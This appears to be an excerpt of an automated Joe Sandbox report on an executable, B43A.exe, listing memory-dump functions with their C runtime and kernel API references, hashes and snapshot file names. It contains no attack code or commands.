                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1735259414-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 390b294f6f9342cc60063322f92ec9ba62fa55ba86a088fc72b874b5282c2cbf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3523c6d786a5fb09a4f0c44a416e1d872516d6fbe816f7f56e2b4ac5949d0bdd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 390b294f6f9342cc60063322f92ec9ba62fa55ba86a088fc72b874b5282c2cbf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7C17E71D05A689FCB25CFA8D8809EDBBB6EF09314F28416AE856F7341D6319D42CF60
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0061C99C
                                                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0061C9B8
                                                                                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0061C9CF
                                                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0061C9ED
                                                                                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0061CA04
                                                                                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0061CA22
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 820123efc2e4b6797f12dd8e27e033b56aa70f5ada5fc6f6ee1dc909c9e3a4b7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c535781d077d50be530c7a43407ed3cec631c68aae784c43303ea9387d899a91
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 820123efc2e4b6797f12dd8e27e033b56aa70f5ada5fc6f6ee1dc909c9e3a4b7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E81F572640B169BD724EF69DC82BDEB7ABAF44330F28452DE411D7381EB70D9808B94
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00621982,00616331,00615E91), ref: 00621999
                                                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006219A7
                                                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006219C0
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00621982,00616331,00615E91), ref: 00621A12
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fa7a03d52bce238e17bb170a8cf5420385002edcb3df74c9614b10b7aa6df0a9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff9ab4faa902a8c38d8cf05079a50dbb25aa59b28bca1f58c760ec7adb46ad51
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a03d52bce238e17bb170a8cf5420385002edcb3df74c9614b10b7aa6df0a9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B801247210EF316EEB6426B4BC865EB2697DB22774B20022DF4104A2F1EE114C809A9C
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                                                  • String ID: E_a
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1740715915-2391180908
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1117ec0acedde1cd3cd8590c811a8bbd25ca500a414bdab65a9b212024245ea8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5bf558bfc864260c26f523315ee44569314d379c5d237f770d2510b54c88e929
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1117ec0acedde1cd3cd8590c811a8bbd25ca500a414bdab65a9b212024245ea8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E451F172A00A26AFDB299F14E841BFEB7A7EF40720F15442DE88157291E771EC91DF90
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0061651F
                                                                                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 006165D3
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                                                  • String ID: E_a$Xba$csm
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3480331319-3445698295
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06b9870a4a9b13e71f3c32bc26e38f3e69e282a186cdc081e558e6e88cb0e145
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 59099f2c42ecdd060dd0692f458aa822887fcfc3d0701dcda7cc0dc0b42898d7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06b9870a4a9b13e71f3c32bc26e38f3e69e282a186cdc081e558e6e88cb0e145
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB41B438A002189BCF10DF68C844ADEBBB7AF45364F188159F8159B356D731DA51CF91
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00407420
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405223: __getptd_noexit.LIBCMT ref: 00405226
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405223: __amsg_exit.LIBCMT ref: 00405233
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00407437
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00407445
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00407455
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID: 'I
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3521780317-315217059
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5867f47dbfe5789569832cb492f98da929baff1a2f191deade0b37e63fb29646
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 912585c7354783b5949b1c1bd1bcd633861af4d054bd02f1fd175d32d3ff9c8c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5867f47dbfe5789569832cb492f98da929baff1a2f191deade0b37e63fb29646
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AF04F31D44A04ABD610FBA5A402B5E36A0AB10758F11867FE450B72D2CB7C6801DE9E
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040685D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405223: __getptd_noexit.LIBCMT ref: 00405226
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405223: __amsg_exit.LIBCMT ref: 00405233
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040687D
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040688D
                                                                                                                                                                                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004068AA
                                                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(005B1660), ref: 004068D5
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: de6548d9f3e01a0b0ac61b5d74d5a1776b51bbe6e2add367b7cd577da426ec69
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 04d54f8b60d6333cd578d7fdbaf3af9e196ee5311d866156874deb98f7f81dd5
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de6548d9f3e01a0b0ac61b5d74d5a1776b51bbe6e2add367b7cd577da426ec69
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001A132D02A11ABD710BB65A805B5E7760AB00764F16813BE811732D1C77CAD62CFDD
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 004064DC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405978: __mtinitlocknum.LIBCMT ref: 0040598E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405978: __amsg_exit.LIBCMT ref: 0040599A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405978: EnterCriticalSection.KERNEL32(?,?,?,004084C0,00000004,0040C4E0,0000000C,004065A7,?,?,00000000,00000000,00000000,?,004051D5,00000001), ref: 004059A2
                                                                                                                                                                                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 004064E7
                                                                                                                                                                                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 004064F6
                                                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,0040C420,0000000C,00405959,00000000,0040C380,0000000C,00405993,?,?,?,004084C0,00000004,0040C4E0,0000000C), ref: 00406526
                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004084C0,00000004,0040C4E0,0000000C,004065A7,?,?,00000000,00000000,00000000,?,004051D5,00000001,00000214), ref: 00406537
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2118092287.0000000000403000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2117929397.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118008646.0000000000401000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118217497.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2118781005.0000000000494000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1eade601f8cc888ed36a05ed1aa7c80117f494920d3e93a657c1e515239a445f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cef7b4fb2fb3a2ce6f8b8a3140fd9300b75d787d530e3f334c06a9082996250d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eade601f8cc888ed36a05ed1aa7c80117f494920d3e93a657c1e515239a445f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF01A271D00615BADB206F72AD06B5F3A64EF01328F11413FF905BA1C5CA3C99508F9D
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062618B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: RtlFreeHeap.NTDLL(00000000,00000000,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?), ref: 006232F8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006232E2: GetLastError.KERNEL32(?,?,006262EA,?,00000000,?,?,?,006261F5,?,00000007,?,?,0062693B,?,?), ref: 0062330A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0062619D
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006261AF
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006261C1
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 006261D3
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 24569545e0e95f965e5be2d3d130bc5444ccd9c00800b2cfaa737d8656fd6b3d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ef7f8b7b953adb65e8aea194a3f45c06a15896f54aed0661327970af6cd4c397
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24569545e0e95f965e5be2d3d130bc5444ccd9c00800b2cfaa737d8656fd6b3d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F04432511B30A78654EB6CF8CBC5673DFAA003107644809F445D7795C736FE804FA8
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3139195894
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c9c581dab76ee4ca5008b808621e5bc24047b626ed6a8f15dd89af4a89b65742
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7295dcb9c761401cea17d413eab1817e93babf675164e1a2b33dca18553078e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9c581dab76ee4ca5008b808621e5bc24047b626ed6a8f15dd89af4a89b65742
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D418471E04215EBCB11DF9ADC81DDEBBBAEB84310B18506AE405D7310DB719E81DBD0
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0062D310,?,?,00000000,00000000,00000000,?), ref: 0062D42F
                                                                                                                                                                                                                                                                                                                                  • CatchIt.LIBVCRUNTIME ref: 0062D515
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_5c0000_B43A.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e28779546563f76a527a00aa10379a0f31318d84c5fe54de5b76c73f24a4b3a7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 642c9de1be0222c42fc1458d14daba70bdb4693bae4b8f550cfe88edf78c5a0a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e28779546563f76a527a00aa10379a0f31318d84c5fe54de5b76c73f24a4b3a7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D418971900519AFCF15DF98EC81AEEBBB2FF08304F148199F904BA255D335A951DF50
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0062CEEC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2119111432.00000000005C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119037784.00000000005C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119302748.000000000063A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.2119360707.0000000000640000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
